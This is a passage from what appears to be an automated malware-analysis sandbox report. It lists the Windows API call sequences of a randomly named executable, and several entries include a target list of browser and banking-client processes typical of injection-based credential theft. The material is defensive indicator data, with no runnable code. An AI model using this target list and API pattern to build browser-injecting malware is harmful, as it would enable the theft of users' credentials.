reateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	6_2_02451660
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_024437E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_024437E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_024437E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012F7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012F7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012F7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012E37E0
